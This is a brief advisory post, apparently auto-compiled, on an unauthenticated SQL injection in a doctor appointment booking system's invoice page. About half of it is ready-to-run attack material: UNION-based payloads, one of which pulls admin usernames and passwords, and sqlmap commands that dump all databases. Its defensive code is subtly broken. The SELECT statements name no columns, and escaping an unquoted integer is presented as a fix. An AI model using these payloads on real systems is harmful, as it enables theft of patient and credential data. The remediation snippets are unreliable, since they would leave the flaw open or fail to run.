The vulnerability in ProjectWorlds’ Online Doctor Appointment Booking System 1.0 (CVE-2025-3186) allows remote attackers to execute arbitrary SQL queries via the `appid` parameter in /patient/invoice.php. This occurs due to improper input sanitization, enabling attackers to manipulate database queries. The flaw is exploitable without authentication, making it critical. Attackers can extract sensitive data, modify records, or execute administrative commands. The exploit is publicly available, increasing the risk of widespread attacks.
DailyCVE Form:
Platform: Online Doctor Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation:
1. Craft a malicious URL:
“`http://target.com/patient/invoice.php?appid=1′ UNION SELECT 1,2,3,4,5– -“`
2. Use SQLmap for automation:
“`sqlmap -u “http://target.com/patient/invoice.php?appid=1” –dbs“`
3. Extract admin credentials:
“`1′ UNION SELECT username,password,3,4 FROM admins– -“`
Protection:
1. Patch: Apply vendor updates.
2. Input sanitization:
$appid = mysqli_real_escape_string($conn, $_GET['appid']);
3. Use prepared statements:
$stmt = $conn->prepare("SELECT FROM invoices WHERE appid = ?");
$stmt->bind_param("i", $appid);
4. WAF rules: Block suspicious SQL patterns.
5. Log monitoring: Detect repeated injection attempts.
Analytics:
- Attack Vector: Remote (HTTP)
- Impact: Data theft, system compromise
- Mitigation Score: 8/10 (with patches)
Commands:
- Test vulnerability:
“`curl “http://target.com/patient/invoice.php?appid=1′”“` - Database dump:
“`sqlmap -u “http://target.com/patient/invoice.php?appid=1” –dump-all“`
Code Snippets:
- Vulnerable code:
$appid = $_GET['appid']; $query = "SELECT FROM invoices WHERE appid = $appid";
- Secure fix:
$stmt = $conn->prepare("SELECT FROM invoices WHERE appid = ?"); $stmt->execute([$appid]);
End of Report.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
